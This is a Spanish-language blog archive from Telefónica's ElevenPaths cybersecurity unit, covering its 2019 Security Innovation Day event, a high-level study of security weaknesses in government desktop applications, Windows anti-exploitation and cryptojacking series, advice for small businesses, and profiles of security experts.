https://www.youtube.com/watch?v=TJz8ObalGAQ Seguimos contando lo que ocurrió el pasado 13 de noviembre en nuestro evento anual de innovación Security Innovation Day 2019: Guards for Digital Lives. Es el turno del equipo de start-ups con la ponencia "Open Innovation Village: Start-ups y Centros de Innovación". ¿Cómo nos imaginamos la ciberseguridad? Inteligencia Artificial con algoritmos complejos de deep learning,con capacidades predictivas donde no solamente los algoritmos nos digan qué va a suceder, sino cómo va a suceder y cuándo, con capacidades de automatización que ya están aquí e irán mejorando en los próximos años. Rames Sarwat, VP de alianzas estratégicas de ElevenPaths, nos cuenta cómo para poder lograr llegar a este estado de ciberseguridad, hemos contado con las mejores start-ups, siendo más de 200 start-ups. Buscamos algo más, buscamos que estas start-ups nos puedan comprender utilizando un enfoque totalmente diferentes. Paloma Castellano, directora de Wayra Madrid nos cuenta cómo la innovación es supervivencia para Telefónica, y debería de serlo para todas las empresas. ¿Conoces el concepto de innovación abierta? Esto es juntar las capacidades internas y externas mediante la integración. A modo de ejemplo, vamos a pensar que Telefónica es un elefante que anda muy despacio, con pasos seguros y en dirección concreta, sin riesgo ninguno. en cambio, las start-ups son gacelas, más ágiles y rápidas, pero a su vez, más frágiles. Lo que desde Wayra se busca es que estos dos animales bailen juntos y creen una única atmósfera. Hoy presentamos tres start-ups que queremos destacar por su valor diferencial: Balbix Inc: esta start-up está ubicada en Silicon Valley y opera en el ámbito de la predicción, realizando un análisis del estado de la ciberseguridad y predice por dónde podemos ser atacados. Hdiv Security: su actividad consiste en proteger las aplicaciones web y APIs, siendo una solución completa que cubre errores de seguridad y fallos de lógica de negocio en el SDLC (Systems Development Life Cycle). CPI Consulting (Corporate Protective Intelligence): esta empresa de ciberseguridad es especialista en protección de redes wifi, ofreciendo soluciones especializadas en protección de sistemas wifi y bluetooth. Por otro lado, destacaron la relevancia de los centros de innovación de reciente apertura como C4IN y Tegra, situados en España y que tienen como objetivo tanto crear tecnología, divulgar y concienciar en ciberseguridad, como captar talento especializado. En los próximos meses se inaugurará un nuevo centro en Valencia, Soth (Security of Things). ElevenPaths planifica continuar en los próximos años con la apertura de más centros tanto en Latam como en el resto de Europa. Descubre qué contaron nuestros expertos en el resto de ponencias:
27 de noviembre de 2019
Presentamos los Digital Operation Centers, el lugar donde se integran todos los servicios digitales durante el SID2019
La Unidad de Ciberseguridad de Telefónica celebra su VII Security Innovation Day, bajo el lema Guards for Digital Lives. Cuenta con ponentes de la talla de Chema Alonso, Julia Perea y Ester Tejedor, entre otros, quienes realizan un repaso a la oferta de innovación de seguridad digital de la compañía. Telefónica unifica en un solo Centro de Operaciones Digitales (DOC) en Madrid, los servicios en la nube, la ciberseguridad, el Big Data y el Internet de las cosas de más de 1.500 grandes clientes empresariales y de la administración. Madrid, 13 de noviembre, 2019.- ElevenPaths, la Unidad de Ciberseguridad de Telefónica, celebra el VII Security Innovation Day, evento de referencia nacional e internacional sobre innovación y seguridad, bajo el lema Guards for Digital Lives. Un evento contextualizado en la película Blade Runner, y en el mundo distópico que pronosticaba la película para noviembre de 2019, ElevenPaths comparte su visión sobre las futuras tendencias de ciberseguridad en el mercado y presenta las principales líneas estratégicas de la unidad para los próximos años. El evento comienza con un breve resumen de lo que se va a contar a lo largo del encuentro. Un resumen repleto de similitudes con la película de BladeRunner. Acto seguido, suben al escenario Raúl Breton (SOC Manager de Telefónica España), Ester Tejedor (Telefónica Global SOC Manager), Miguel Ángel de Castro (SOC Architect) y Carmen Torrano (AI Expert). Nos cuentan cómo se ha evolucionado de los centros de operaciones antiguos, manuales y sin automatización ninguna, a los futuros, integrados con servicios digitales como Big Data, Cloud, IoT y Digital Workplace, pasando por la automatización y la Inteligencia Artificial, y creando el DOC (Centro de Operaciones Digitales) del futuro. En este DOC se integra tanto la automatización y orquestación de servicios, como la gestión de detección y respuesta de amenazas, información destacable de las mismas y análisis de incidentes avanzado, todo esto gestionado mediante Inteligencia Artificial. Llega la hora de hablar de start-ups y centros de innovación, ubicados en diferentes puntos del país. Rames Sarwat (Director de Alianzas, nuevos productos y Chief Security Ambassadors) y Paloma Castellano (Directora de Wayra Madrid Telefónica) nos cuentan cómo, mediante la innovación abierta, desde Telefónica se apuesta por las start-ups tecnológicas para crear proyectos innovadores. Las tres start-ups invitadas son: Balbix Inc: esta start-up está ubicada en Silicon Valley y opera en el ámbito de la predicción, realizando un análisis del estado de la ciberseguridad y predice por dónde podemos ser atacados. Hdiv Security: su actividad consiste en proteger las aplicaciones web y APIs, siendo una solución completa que cubre errores de seguridad y fallos de lógica de negocio en el SDLC (Systems Development Life Cycle). CPI Consulting: esta empresa de ciberseguridad es especialista en protección de redes wifi, ofreciendo soluciones especializadas en protección de sistemas wifi y bluetooth. Por otro lado, destacaron la relevancia de los centros de innovación de reciente apertura como C4IN y Tegra, situados en España y que tienen como objetivo tanto crear tecnología, divulgar y concienciar en ciberseguridad, como captar talento especializado. En los próximos meses se inaugurará un nuevo centro en Valencia, Soth (Security of Things). ElevenPaths planifica continuar en los próximos años con la apertura de más centros tanto en Latam como en el resto de Europa. Tras la pausa del café, llega el slot en el que cuentan cómo se pretende mejorar la resistencia entre ataques distribuidos de denegación de servicios. Alejandro Ramos (Security Operations Director) y Gloria Nieto (Network Security Manager de Telefónica) hablan de cómo gracias al testing continuo que realizamos mejoramos la respuesta y prevención de los ataques DDoS. Durante la mesa redonda de innovación y diversidad en ciberseguridad, se recalca la importancia de la pluralidad en los equipos para fortalecer y llegar más lejos. Julia Perea (Digital Security Director de Telefónica España), Juan Cobo (Global CISO de Ferrovial), Natalia Moreno (CyberThreats Security Analyst de Telefónica) y Laura Castela (Head of 42 Madrid Fundación Telefónica), cuentan la importancia de la diversidad de sus equipos y cómo con la colaboración de cada miembro llegan a mejor fin. El equipo de Innovación y Laboratorio, de la mano de Sergio de los Santos (Lab & Innovation Director ElevenPaths), Yaiza Rubio (Technical Lead Network Tokenization Telefónica), Claudio Caracciolo (Head of Chief Security Ambassadors & Lab Coordinator) y José Torres (Tech Lead Innovation and Lab Team ElevenPaths), presentan, un año más, nuevas herramientas: IDoT: Identificación de IoT a través de la tecnología Capacicard y la PKI de Telefónica para que los sistemas hereden credenciales tanto del dispositivo como del usuario que lo está usando en ese momento. Rosetta: Sistema para conectar la seguridad a cualquier canal de mensajería Instantánea como WhatsaApp, Telegram… Diario: Detecta malware en documentos de forma inteligente sin necesidad de comprometer el contenido de los mismos. MAD: Detecta la agresividad de la publicidad en términos de intrusividad en aplicaciones Android antes de instalarlas. Y para cerrar este encuentro, Chema Alonso, Chairman de ElevenPaths y Chief Data Officer de Telefónica, en su ponencia titulada “Keep Always Alert!”, muestra varias demos en directo centrándose en la privacidad y APT. No podía faltas una demo de la herramienta estrella de la Unidad de Ciberseguridad, FOCA, denominada para esta ocasión FOCA GPS.
13 de noviembre de 2019
Security Innovation Day 2019: Guards for Digital Lives
Noviembre 2019, Madrid. Un grupo fugitivo de replicantes ha escapado de las colonias del mundo exterior, aterrizando en el planeta tierra con el objetivo de amenazar la seguridad de nuestra vida digital. Un cuerpo especial de guardianes se ocupa de identificar, detectar y responder ante aquellas ciberamenazas presentes en un mundo hiperconectado. Para que nuestro 2019 no se convierta en aquella versión distópica que pronosticó Blade Runner, te presentamos a nuestros Guards for Digital Lives, los encargados de crear innovación de ElevenPaths automatizar procesos, restablecer los servicios de nuestros clientes cuando ocurre un incidente de seguridad... En definitiva, seguridad creada por personas para personas. El próximo 13 de noviembre tendrá lugar la VII edición del Security Innovation Day, donde conocerás nuestros futuros proyectos, vivirás en primera persona demos de ElevenPaths y compartirás espacio con nuestros expertos y analistas. Are you ready to join? ¡No te pierdas Security Innovation Day 2019! Nov-19 : The Future is Now, Blade Runner está aquí. REGÍSTRATE AQUÍ Comparte una tarde con nosotros y descubre cómo tomar el pulso a los sistemas de la información de tu empresa con nuestras nuevas herramientas de seguridad. Agenda del #SID2019: 15:00 – 15:10 Acreditación 15:45 – 16:35 Futuro de las SeOps: de la automatización a la Inteligencia Artificial Raúl Breton (Security Manager, SOC Telefónica) Ester Tejedor (TWIS Security Platform Manager) Miguel Ángel de Castro (Cyber Threat Analyst ElevenPaths) David Martín Lindström (Head of Products & Solutions Management ElevenPaths) Carmen Torrano (Product Manager Security IoT) 16:35 – 17:15 Open Innovation Village: Start-ups & Innovation Centers Rames Sarwat (Director of Alliance, New Products and Chief Security Ambassadors) Antonio Sahagún (Global Strategic Alliance & Partnerships Manager Telefónica) 17:15 – 17:55 Expo Village Exposición de demos y café 17:55 – 18:15 Improving Resilience: DDoS Attacks Alejandro Ramos (Global Chief Security Operations Officer ElevenPaths) Gloria Nieto (Network Security Manager Telefónica) 18:15 – 18:50 Round Table: Innovation & Women in Cybersecurity Julia Perea (Digital Security Director Telefónica España) Natalia Moreno (CyberThreats Security Analyst Telefónica) Laura Castela (Head of 42 Madrid Telefónica) Juan Cobo (Global CISO Ferrovial) 18:50 – 19:30 Fighting and Detecting Replicants With New Innovation Weapons Sergio de los Santos (Lab & Innovation Director ElevenPaths) Yaiza Rubio (Technical Lead Network Tokenization Telefónica) Claudio Caracciolo (CSA Team & Laboratory Office BS. AS. Coordinator ElevenPaths) 19:30 – 19:50 Closing Session Chema Alonso (Chief Data Officer Telefónica - Chairman ElevenPaths) 19:50 - 20:00 Cuestionario Este evento no sería posible sin el apoyo de nuestros patrocinadores, a los que desde aquí queremos agradecer su confianza y ayuda para poder seguir realizando nuestro evento de innovación un año más. ¡Gracias a todos! Síguenos a través de la web del evento y en nuestros perfiles de redes sociales con el hashtag #SID2019 y #GuardsforDigitalLives. Nos vemos el próximo miércoles, 13 de noviembre, en el Auditorio Central de Telefónica.
23 de octubre de 2019
Binary leaks: desde bases de datos de ciudadanos a contraseñas expuestas, los ejecutables de los gobiernos analizados
Nuestro equipo de CSAs ha realizado una serie de pruebas para evidenciar el estado actual de la seguridad de aplicaciones proporcionadas por gobiernos en diferentes países de habla hispana. Se realizó una revisión general de las potenciales debilidades en cuanto al desarrollo de software y cómo la falta de controles de seguridad adecuados podría ser aprovechadas por atacantes. Hemos descubierto desde contraseñas hasta bases de datos que no deberían ser públicas. Los programas proporcionados por gobiernos deberían aportar (tanto o más que el resto) controles de seguridad apropiados para salvaguardar la confidencialidad, integridad y disponibilidad de la información. Mediante ellos se generan procesos de gestión información ciudadana como: trámites aduaneros o tributarios, gestión financiera y de contaduría, administración pública, servicios educativos, facturación electrónica, datos relacionados al sector hospitalario y de salud, DNI (firmas electrónicas) y muchos tantos que pueden contener información sensible sobre el ciudadano. Hemos realizado un análisis general de las aplicaciones (archivos binarios) que las organizaciones gubernamentales ponen a disposición dentro de sus sitios web para que los ciudadanos los descarguen e instalen en sus equipos. Metodología En concreto se analizaron 62 aplicaciones con foco en la región de Hispanoamérica. A continuación, exponemos referencias de las aplicaciones y ciertos datos del contexto en que fueron analizadas. 22 aplicativos están dirigidos para que las personas o empresas gestionen su información tributaria y declaración de impuestos y 5 dedicados a gestión de información de aduanas. Se revisaron 15 programas que permiten gestionar información de la administración pública como: datos escolares, compras públicas, datos de ministerios, seguro social…. 10 aplicaciones permiten gestionar servicios electrónicos como emisión de certificados digitales, procesos de gestión pública y firma electrónica. 6 aplicaciones para gestionar datos financieros, seguros y contaduría. 4 programas para gestionar información de entidades sanitarias. Es importante resaltar que las pruebas realizadas NO tienen como objetivo ataques a la infraestructura tecnológica de las organizaciones involucradas, acceder a información sensible de las organizaciones públicas o facilitar información que pudiera ligar una organización con los resultados mostrados en este informe. Este documento tiene como objetivo poner en contexto los riesgos que, derivados de fallos en el desarrollo o implementación del software, amenazan la seguridad de los ciudadanos o empresas usuarias. Esto último es especialmente importante porque muchos de estos programas están probablemente funcionando como parte del conjunto de aplicaciones instaladas dentro de las redes internas de empresas. En base a las pruebas técnicas se buscaron debilidades en las aplicaciones mediante las que quizás los ciudadanos (usuarios) sin conocerlo, estén exponiendo información privada, datos sensibles de la entidad responsable de la aplicación o debilidades que puedan ayudar a comprometer el equipo donde está ejecutándose la aplicación. Entre algunas de las principales vulnerabilidades que se intentarán descubrir estarán, por ejemplo; debilidades que expongan información privada del usuario, falta de protección en el binario del programa, datos que viajen por canales inseguros, exposición de dato sensibles de configuraciones de los aplicativos. Resultados Presentamos algunos de los resultados más destacados. Se detectaron aplicaciones que incluyen archivos de tipo MS Access (.mdb) que almacenan información con la que trabaja la aplicación. Revisando esta funcionalidad se evidenció que el 14% de las aplicaciones analizadas almacenan información sensible de manera insegura (texto plano) como usuarios y contraseñas, credenciales de aplicativo, o en algún caso credenciales de acceso a servidores. Si bien algunas de estas bases de datos solicitaban una clave para poder acceder, mediante la decompilación de código se pudieron obtener varias de estas contraseñas. Con respecto a las medidas de seguridad tomadas en los binarios, hemos encontrado hasta 8 mitigaciones de seguridad que se consideran buenas prácticas a la hora de crear los programas. Previenen un impacto mayor en Windows en el caso de que contengan vulnerabilidades y sean explotadas. En alguna decompilación de los binarios (sencilla al utilizar .NET) se pueden observar contraseñas de acceso a la base de datos. Una buena práctica para eliminar una gran cantidad de fallos de seguridad al momento de desarrollar software, es prohibir el uso de funciones inseguras “deprecated” u obsoletas. Estas suelen estar señaladas por los lenguajes como vulnerables y muchas veces de la misma manera por los mismos fabricantes. Además, suele estar relacionado con el uso de versiones actualizadas de la tecnología de programación y librerías de terceros. Conclusiones De acuerdo al análisis realizado se desprenden las siguientes conclusiones de manera general: En total se encontraron 148 funciones obsoletas o vulnerables que han sido usadas en el desarrollo de las 62 aplicaciones. Entre las que más ocurrencias encontramos destacan memcpy(), strlen(), strcpy(), strcat(), sprintf(), lo que puede determinar un grado relevante de inseguridad dentro del host donde se esté ejecutando estos programas. En cuanto a los niveles de seguridad identificados en los binarios de nuestro estudio podemos indicar que tecnologías más recientes como CFG no están activadas en ninguno de los programas. Otro tipo de controles más conocidas como ASLR y DEP solo están presenten en el 30% de las evaluadas. Esto nos alerta que deberán integrar en el ciclo de desarrollo la activación de todas las características anti-exploiting posibles para elevar el nivel de seguridad de los binarios. La protección del código fuente de estos programas está presente en solo 8 de 62 aplicaciones usan algún método de ofuscación, en algunos casos de manera parcial. Solo el 8% utilizan certificados digitales para firmar digitalmente el programa y así, el ciudadano tenga un programa fiable donde pueda garantizar que el software no ha sido alterado o comprometido por una tercera parte. Se evidenció que 17 aplicaciones establecieron canales de comunicaciones por la red hacia servidores de las entidades. Solo cuatro de ellos establecen canales seguros HTTPS y 13 envían toda la información a través de canales inseguros donde podrían interceptar los datos en tránsito. 5 aplicaciones son detectadas como código malicioso en el momento de la ejecución. Hemos revisado que en cuanto a la protección y fuga de datos en 20 de los 62 programas destaca principalmente el uso de datos de configuraciones (urls, ip privadas, usuarios, claves, API Keys, etc.) en texto plano, que deberían eliminarse si no son utilizados o donde deberían tomarse controles que permitan que estos datos sean ilegibles por un agente externo de la aplicación. Detectamos 8 credenciales (usuarios y claves, JKS Keys, cadenas de Conexiones a Base de Datos…) incrustadas o en texto plano. El informe completo disponible desde: Binary leaks: Análisis de las aplicaciones proporcionadas por gobiernos en HISPAM from ElevenPaths
10 de septiembre de 2019
Un resumen sobre la lucha de Windows contra la ejecución de código
Con la llegada de Windows 10 parecía que Microsoft apostaba definitivamente por la seguridad en su sistema, pero la realidad nos dice que las técnicas y medidas que pretenden implementar son demasiado complejas para la gran mayoría de usuarios. En esta serie de posts, queremos aclarar de qué manera está actuando Microsoft para "luchar" contra la ejecución de código no solicitado destacando sus principales éxitos y fracasos: En este primer post planteamos la problemática y presentamos Windows Defender Exploit Guard, "el paraguas anti-explotación y anti-ejecución" en Windows 10. CYBER SECURITY La lucha de Windows contra la ejecución de código: Éxitos y fracasos (I) 22 de julio de 2018 Seguimos con el análisis de Windows Defender, en esta ocasión centrándonos en "Exploit Protection". CYBER SECURITY La lucha de Windows contra la ejecución de código: Éxitos y fracasos (II) 29 de julio de 2018 En esta tecera entrega, vemos cómo evitar que se cargue código en memoria (que suele ocurrir un poco después de la explotación exitosa de alguna vulnerabilidad). CYBER SECURITY La lucha de Windows contra la ejecución de código: Éxitos y fracasos (III) 5 de agosto de 2018 Comparamos las funcionalidades del antiguo EMET de Microsoft con el nuevo ecosistema Windows Defender. CYBER SECURITY La lucha de Windows contra la ejecución de código: Éxitos y fracasos (IV) 2 de septiembre de 2018 Hablamos de las novedades que incorpora Windows 10, independientemente de lo que fue EMET. CYBER SECURITY La lucha de Windows contra la ejecución de código: Éxitos y fracasos (V) 14 de octubre de 2018 En este post analizamos en profundidad en qué consiste ASR: Attack Surface Reduction, el sistema que pretende frenar ataques muy concretos de forma muy específica. CYBER SECURITY La lucha de Windows contra la ejecución de código: Éxitos y fracasos (VI): Attack Surface Reduction 10 de febrero de 2019 Finalizamos este detallado análisis con las diferentes "recetas" que incluye ASR. CYBER SECURITY La lucha de Windows contra la ejecución de código: Éxitos y fracasos (VII): Attack Surface Reduction 10 de marzo de 2019
19 de agosto de 2019
¿Qué es el Cryptojacking? Resumen de esta nueva amenaza
Seguro que has oído hablar de las criptomonedas y de la tecnología Blockchain aplicada a la seguridad de estas nuevas divisas, pero este nueva manera de realizar transacciones también llama la atención de cibercriminales que amenazan su seguridad. A través de esta serie de posts, escritos por nuestro CSA Diego Espitia, analizamos la situación del Cryptojacking, un tipo de secuestro de dispositivos con la intención de cobrar las comisiones que generan los procesos de "minería" de criptomonedas. En este primer post presentamos la problemática que surge alrededor de las criptomonedas y su seguridad. Además, presentamos las divisas más afectadas por esta amenaza. CYBER SECURITY Cryptojacking: Amenaza latente y creciente. Parte 1 de 4 15 de agosto de 2018 Entramos en materia con esta segunda parte y profundizamos sobre varios de los objetivos de los cibercriminales y a qué entornos afectan. Continuamos con los principales entornos afectados por el Cryptojacking y la manera de infectar a los usuarios. CYBER SECURITY Cryptojacking, entornos amenazados. Parte 3 de 4 5 de septiembre de 2018 Por último, en esta cuarta entrega te enseñamos cómo protegerte y aprender a detectar estas amenazas. CYBER SECURITY Cryptojacking, prevención y contramedidas. Parte 4 de 4. 19 de septiembre de 2018
14 de agosto de 2019
Del #11PathsTalks a Black Hat Conference Las Vegas
Hoy es el día en el que deberíamos publicar el #11PathsTalks sobre CarHacking. Sin embargo, y debido a que parte del equipo de ElevenPaths se encuentra en Las Vegas presentando en el Arsenal de BlackHat una nueva herramienta open source desarrollada por el equipo de Innovación y Laboratorio, hemos decidido posponer la publicación de este webinar para complementarlo con información que pueda ser relevante de la Car Village Hacking de DefCon. Unión entre nuestro webinar y la conferencia Black Hat USA Por una sencilla razón: recientemente surgió a la luz que la CHV (Car Hacking Village) volverá a tener un CTF (Capture The Flag) especifico como en anteriores años, pero que esta vez su premio para el equipo ganador del encuentro será, nada más y nada menos que, un Tesla. A partir de este anuncio y viendo que muchas personas han decidido competir por este preciado premio, estamos seguros de que la Village tendrá mucho más movimiento de lo normal, y podremos observar algunos nuevos desarrollos, metodologías y estrategias de ataque que los asistentes intentarán desarrollar y utilizar. El #11PathsTalks que hemos grabado y planeábamos publicar, fue diseñado con el objetivo de abordar la temática desde lo conceptual, pasando por la red CAN Bus, hasta entender cómo son las medidas de seguridad en los coches conectados, conociendo los distintos vectores de ataque que se podrían utilizar, y, sobre todo, sobre cómo podríamos empezar a analizar nuestros propios vehículos. Sin embargo y a pesar de contar con un invitado de lujo para este webinar, hemos decidido esperar a ver qué cosas nuevas suceden en estos días tan especiales, saber quién o quiénes serán los afortunados ganadores del Tesla, y aportar esta información a nuestro webinar. Estad atentos a los anuncios sobre la nueva fecha del talk, lo comunicaremos vía RRSS. Nuestros compañeros Claudio Caracciolo y Yamila Levalle en Black Hat Las Vegas.
8 de agosto de 2019
Pymes y ciberseguridad, ¿por dónde empiezo?
Según un estudio y Ponemon Institut, el 60 % de las pymes que sufren un ataque informático desaparece en los seis meses siguientes Las grandes empresas son conscientes de los riesgos existentes en materia de ciberseguridad. Por ello, son muchas las que han incrementado la inversión en la implementación de medidas de protección. Sin embargo, cuando hablamos de PYMEs, nos enfrentamos a una situación diferente. Los ataques dirigidos a este segmento empresarial son mayoritarios y van en aumento, pero nos encontramos ante dos problemas a resolver: concienciación y conocimiento. Concienciación Las PYMEs suelen ocupar la mayor parte del tejido empresarial de un país. Teniendo en cuenta que la mayoría de los ataques cibernéticos son indiscriminados, no buscan el ataque de una víctima concreta. La probabilidad de que una PYME sea atacada es altamente probable. Del total de los ataques, el 40 % de los mismos van dirigidos a empresas pequeñas que, al no disponer de medidas de seguridad implementadas, se convierten en un objetivo fácil. Como resultado, el 70 % de las PYMEs han sido, en algún momento, atacadas. Sin embargo, como puede verse con estas gráficas, los empresarios no están todavía concienciados sobre ello: Conocimiento Las empresas de este segmento no cuentan con una persona especializada capaz de decidir qué medidas deben tomar para proteger sus negocios de estas amenazas. Además, los recursos son escasos o nulos. Sin embargo, el desconocimiento de las medidas que deben tomar para proteger sus sistemas y su información de ser atacados, no les exime de responsabilidad y, en caso de sufrir un incidente de seguridad, les pueden imponer una cuantiosa sanción, además de las pérdidas. Constata que 6 de cada 10 PYMEs víctimas de un ciberataque no lo superan y tienen que echar el cierre en los seis meses siguientes. El objetivo de este documento es dar a conocer los principales ataques de ciberseguridad que sufren las PYMEs e identificar las medidas que se deben poner en marcha para protegerse. Según un estudio mundial realizado por Ponemon Institute, este gráfico refleja el tipo de ataques que han sufrido en el segmento durante 2018, así como su varianza con respecto al año anterior. Una vez identificados los principales tipos de ataques y teniendo en cuenta dos importantes certezas (la seguridad completa no existe y el número de ataques va en aumento), el objetivo es gestionar los riesgos con unos recursos eficientes y unas características específicas para este segmento. Tras identificar los principales ataques, nos queda conocer cuáles son las medidas básicas que permite protegernos de estos e implementarlos para proteger el negocio. Los canales de entrada principales que un ciberdelincuente va a utilizar para atacar de manera masiva son tres. Por ello, se requiere una protección básica del correo electrónico, la navegación web y los dispositivos. Correo electrónico Es la principal puerta de ataque con una cifra del 76 %. La única alternativa para poder evitar estos ataques es la protección, el correo electrónico se ha convertido en la herramienta de comunicación más usada. Es fundamental instalar una solución que garantice la detección de amenazas y proteger la información para que, en caso de que algo ocurra, garantizar la continuidad del negocio. Principales beneficios: 99,9 % de correos electrónicos sin amenazas garantizados. Reducción de los problemas de almacenamiento del servidor, garantizando la disponibilidad de backups de seguridad. Protección para la organización contra fugas de información a través de correos electrónicos. Cumplimiento de las leyes y regulaciones gracias a las funciones de archivado y encriptación. Navegación web La navegación en Internet es el segundo canal de ataque preferido para los ciberdelincuentes. Son distintas las técnicas que se utilizan para conseguir redirigirnos a una página con malware: infectando previamente la web, incluyendo anuncios con contenido malicioso o suplantando webs legítimas. Al visitar una página infectada puede que introduzcan código malicioso y aprovecharse de las vulnerabilidades que ya tenemos en nuestro ordenador. Para proteger la navegación web es importante mantener nuestros navegadores actualizados y utilizar un servicio que nos garantice una navegación segura para que bloquee el acceso a webs con código malicioso. Principales beneficios: Verifica que los sitios por los que navegas son fiables y bloquea el acceso a páginas maliciosas que suplantan webs legítimas. Garantiza el óptimo consumo de los equipos y evita ser utilizados con fines maliciosos. Permite excluir la navegación por páginas como: redes sociales, descarga de películas, juegos online, etc Posibilita obtener información sobre la navegación. Endpoint Es uno de los puntos más críticos y uno de los mayores vectores de ataque, por tanto, tener instalado un antivirus actualizado permite que los virus de la red no pasen a nuestros dispositivos y sistemas. A la hora de seleccionar un antivirus hay que tener en cuenta los múltiples y distintos dispositivos que usamos. Muchos de ellos no comparten el mismo sistema operativo, por lo que será necesario buscar un servicio multidispositivo con capacidad de proteger diferentes endpoint. La función de un antivirus es detectar amenazas, tenemos que asegurarnos que el antivirus detiene más del 95 % del malware y que la evolución continua de los virus requiera que el antivirus se actualice de manera automática. Los principales beneficios del antivirus son: Navegación web segura Realización de copia de seguridad Control de acceso a aplicaciones Ubicación y borrado remoto Almacenamiento y administración de contraseñas seguras La propuesta de Seguridad Informática de Telefónica para el segmento de PYMEs consiste en proteger el negocio de nuestros clientes a través de servicios económicos, fáciles de usar y con un soporte asociado que le permita responder y asesorar en su implantación.
18 de julio de 2019
Estos son nuestros ElevenPaths CSEs en España
¿Todavía no conoces el programa de CSAs de ElevenPaths? Nuestros Chief Security Ambassadors son expertos en ciberseguridad, embajadores de nuestra marca alrededor del mundo cuya misión es promocionar la cultura de la seguridad a través de conferencias y artículos. Desde ElevenPaths consideramos su aportación de gran importancia y es por eso que queremos ampliar el alcance de estos embajadores con nuestro programa de reconocimiento de profesionales del sector de la ciberseguridad creando una nueva figura: los ElevenPaths CSE (Chief Security Envoy). Este programa se lanzó en España y Ecuador de manera paralela, en primer lugar os queremos presentar a los expertos seleccionados para el programa en España y, en unos días, os presentaremos a nuestros ElevenPaths CSE en Ecuador. A continuación, una breve descripción de nuestro nuevos CSEs en España. Juan Francisco Bolivar Fran es Security & Risk Manager en una importante compañía de la industria farmacéutica con presencia en más de 25 países. Además, ha escrito el libro "Infraestructuras críticas y sistemas industriales: Auditorias de seguridad y fortificación" de la editorial 0xWord. Es Ingeniero de Telecomunicaciones por la UAH y Master en Seguridad por la UNIR, profesor en el Master de seguridad Informática de la Universidad de Castilla la Mancha y profesor del master de Ciberseguridad y Ciberdefensa del Ejército Colombiano. También ostenta distintas certificaciones como CEH de Ec-Council, CISA de ISACA y GCIH de SANS entre otras. Ha sido ponente en conferencias como, Hackron, Sh3llcon, HoneyCon, Cybercamp, ISACA, CiberSeg, Palabra de Hacker. Como investigador de seguridad ha obtenido más de 10 CVE en el sector Industrial (Honeywell, Siemens, Cisco, Schneider Electric). Antonio Fernandes Antonio lleva prácticamente 20 años implicado en proyectos de ciberseguridad. Actualmente es Cybersecurity Manager en una importante empresa del sector industrial Gallego. Anteriormente ha trabajado en distintos sectores como la banca, el retail o la consultoría. Ha participado en diversos foros especializados y generalistas, como son NoCOnName, Citech, Librecon y en varias acciones formativas de universidades. Es también miembro activo de la organización del evento trimestral Hack&Beers Vigo y del congreso de seguridad, viCON. Carmen Torrano Carmen es doctora en Informática por la Universidad Carlos III de Madrid. Desarrolló este doctorado, especializado en seguridad informática e inteligencia artificial, en el Consejo Superior de Investigaciones Científicas. Actualmente trabaja en Telefónica, en el departamento de Seguridad IoT, la cual pertenece tanto a ElevenPaths como al área de IoT. Además, paralelamente desarrolla labores docentes en universidades españolas. Carmen ha publicado en numerosas conferencias y revistas relevantes en el área de la ciberseguridad y colabora en la difusión de contenidos científico-técnicos. Andrés Naranjo Andrés es Analista en Ciberinteligencia en el departamento de Venta Especialista de ElevenPaths, donde colabora en las ofertas comerciales de Telefónica hacia sus mayores clientes como asesor técnico. Posee múltiples certificaciones en ciberseguridad y formación específica en ciberinteligencia. Experto en ciberinteligencia de detección de amenazas, Open-Source Intelligence y Redes Sociales. Habitualmente colabora en eventos para difundir la educación en seguridad de los datos. Carlos Rodríguez Morales Carlos es CEO de ARPSecure, proyecto personal sobre servicios de Ciberseguridad, que compagina con la dirección del área de negocio de Business Information Security en Sistel. En su (escaso) tiempo libre, es miembro de ISACA y Cibercooperante en INCIBE, donde desarrolla una intensa labor en la divulgación de la ciberseguridad a través de charlas de sensibilización en centros que requieren de este tipo de formación. Además, es impulsor de Hack&Beers Alicante, ponencias gratuitas para interesados en la seguridad informática. Su carrera ha estado enfocada en áreas de responsabilidad en Sistemas de información en empresas como Adeslas, IMS Health, y EUIPO. Paralelamente ha estado interesado en la seguridad de la información y desde hace años su principal foco profesional en proyectos como Siemlab, Sistel_BIS o ARPSECURE. Pilar Vila Pilar es Ingeniera Informática por la Universidad de A Coruña, perteneciente al cuerpo oficial de Peritos de Galicia. Acreditación profesional de la Asociación Nacional de Ciberseguridad y Pericia Tecnológica. Cuenta con más de 15 años de experiencia laboral en el ámbito de las TIC como analista, programadora y perito informático. Actualmente es CEO y Cofundadora de Forensic & Security, empresa centrada en ciberseguridad e informática forense, y de Developers Forensics Tools, empresa centrada en el desarrollo de soluciones de ciberseguridad hardware/software. Dispone de certificaciones CHFI otorgada por EC-Council y se encuentra preparando doctorado en Informática Forense y Ciberseguridad en la universidad de A Coruña. También compagina su actividad profesional con la docencia de Informática Forense en distintos másteres de Seguridad, actualmente en la UCLM y en las universidades de A Coruña y Vigo y docente de ciberseguridad, en Jornadas para la Guardia Civil y Policía Nacional en Galicia y para la Armada Española. Además es autora del libro “Técnicas de Análisis Forense Informático para Peritos Judiciales Profesionales“ de la editorial 0xWord. Co-organizadora del evento de ciberseguridad Maria Pita DefCon y pertenece a la junta directiva del Colegio de Ingeniería Informática de Galicia. Amador Aparicio Amador es Ingeniero Superior en Informática por la Universidad de Valladolid y ha cursado un PostGrado en Seguridad de las Tecnologías de la Información y Comunicación por la Universidad Oberta de Catalula y la Universidad Autónoma de Barcelona. Trabaja como Profesor de Formación Profesional en el Centro Don Bosco de Villamuriel de Cerrato, actividad que compagina con la de Profesor en el Máster de Ciberseguridad y Seguridad de la Información de la Universidad de Castilla la Mancha y en el Máster Universitario en Seguridad de Tecnologías de la Información y las Comunicaciones de la Universidad Europea de Madrid. Además, es Mentor/Seleccionador dentro del programa Talentum Startups de Telefónica. Ha sido ponente en los principales congresos de Seguridad Informática en España, como Navaja Negra , Jornadas STIC organidadas por el CCN CERT, RootedCON y SecAdmin. También es coautor del libro “Hacking Web Tecnologies”. Claudio Chifa Claudio es experto en ciberseguridad con más de 15 años de experiencia y dispone de reconocidas certificaciones a sus espaldas. Entre sus intereses destacan las ciencias forenses y el cloud computing. Ha dado charlas y ponencias en diferentes foros públicos como Cybercamp, UbuCon Europe, CEF y es colaborador habitual de diferentes asociaciones de peritos y FCSE. Actualmente, trabaja como Director ITaaS en IDavinci donde coordina varias iniciativas I+D en varios ámbitos IT/OT. Miembro de ENISA en la lista de expertos de: (A1) A1 group: Internet of Things, eHealth, cyber insurance, smart infrastructures, Smart Grids, Mobile technologies, network interdependencies, 